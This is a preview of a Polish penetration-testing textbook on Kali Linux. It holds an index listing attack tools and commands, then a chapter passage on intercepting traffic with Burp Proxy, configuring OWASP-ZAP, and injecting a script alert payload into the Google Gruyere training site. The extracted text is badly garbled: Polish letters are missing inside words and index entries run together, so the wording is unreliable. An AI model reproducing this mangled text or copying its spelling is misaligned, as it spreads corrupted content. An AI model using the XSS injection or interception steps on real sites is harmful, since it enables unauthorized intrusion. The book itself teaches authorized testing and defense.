sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

142ruchu sieciowego 141sesji 284

przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173

Kup książkę Poleć książkę

Skorowidz

334

RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy

b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce

tworzenie 325o wiadczenie o zachowaniu

poufno ci 307podatno ci i luki

w zabezpieczeniach 315podsumowanie ustale 313

zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury

testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje

dla rodowiska sieciowego316

wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami

dokumentacji 308zgodno ze standardami

i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316

powykonawcze 28rekonesans 34 51

badanie zasoboacutew siecikomputerowych 65

Google hacking 61

Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy

adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u

ICMP 69z wykorzystaniem serweroacutew

DNS 71zadania 52zasoby serwisoacutew

spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54

rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia

zdarzenia 31rootkit 295rozsy anie spreparowanych

pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206

adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285

SSAM 171samdump2 178Scalpel 299

Scapy 257 259scenariusze atakoacutew 260

security assessment 21security audit 21serwery 91

aplikacji internetowych 92223zabezpieczanie 136 249

atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236

wykorzystanie 238Samba 116sieciowe 91WWW 262

serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71

serwisy spo eczno ciowe 58sesja 195

ciasteczka 197logowania 205mechanizmy bezpiecze stwa

195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249

adres IP sklonowanej witryny158

aplet Java 156Credential Harvester Attacks

157Exploit to deliver 154importowanie w asnych

plikoacutew witrynyinternetowej 158

IP addresshostname forreverse connection 154

mechanizmy chroni ceprzeprowadzany atak 155

NATPort forwarding 154przechwycenie nazw kont

i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych

wiadomo ci 159URL you want to clone 154

Kup książkę Poleć książkę

Skorowidz

335

uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku

z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery

biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 15: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

